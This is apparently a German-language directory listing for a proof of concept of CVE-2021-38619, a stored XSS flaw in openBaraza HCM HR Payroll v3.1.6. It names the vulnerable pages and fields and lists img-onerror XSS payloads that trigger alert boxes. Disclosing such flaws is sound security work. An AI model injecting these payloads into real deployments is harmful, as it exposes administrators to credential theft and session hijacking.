Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-38619 — Proof-of-Concept für CVE-2021-38619: nicht authentifiziertes gespeichertes XSS in openBaraza HCM HR Payroll v3.1.6, mit Payload-Beispielen für Anmeldedatendiebstahl und Session-Hijacking. | Kitploit
Tools/GitHubGitHub/charlesbickel/cve-2021-38619
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubcharlesbickel/cve-2021-38619

CVE-2021-38619

Proof-of-Concept für CVE-2021-38619: nicht authentifiziertes gespeichertes XSS in openBaraza HCM HR Payroll v3.1.6, mit Payload-Beispielen für Anmeldedatendiebstahl und Session-Hijacking.

Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-38619 openBaraza HCM HR Payroll v.3.1.6 Nicht authentifizierte Stored-XSS-Schwachstelle

openBaraza HCM v.3.1.6 neutralisiert benutzergesteuerte Eingaben nicht ordnungsgemäß, was es einem nicht authentifizierten Remote-Angreifer ermöglichen könnte, eine Stored-Cross-Site-Scripting (XSS)-Attacke gegen einen administrativen Benutzer von mehreren Seiten aus durchzuführen. Wenn ein Angreifer beliebigen JavaScript-Code in anfällige Seiten injiziert und legitime Benutzer versuchen, die betroffenen Seiten zu besuchen, wird der Code ausgeführt. Dies könnte zum Stehlen von Anmeldedaten, Session-Hijacking oder zur Auslieferung von Malware an das Opfer führen.

Entdecker: Charles Bickel & Gideon Gray


Anfällige Seite: http://serverip:9090/hr/application.jsp

Anfällige Textfelder: first_name, surname, email

Payloads:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('First');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('Surname');" />
  • [email protected]<img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Betroffene Seite: http://serverip:9090/hr/index.jsp?view=23:0

application.jsp


Anfällige Seite: http://serverip:9090/hr/subscription.jsp

Anfällige Textfelder: business_name, primary_contact, primary_email, confirm_email

Payloads:

  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('business');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('contact');" />
  • <img src="https://raw.githubusercontent.com/charlesbickel/cve-2021-38619/HEAD/x"onerror="alert('email');" />

Betroffene Seite: http://serverip:9090/hr/index.jsp?view=94:0

subscription.jsp

Tool herunterladen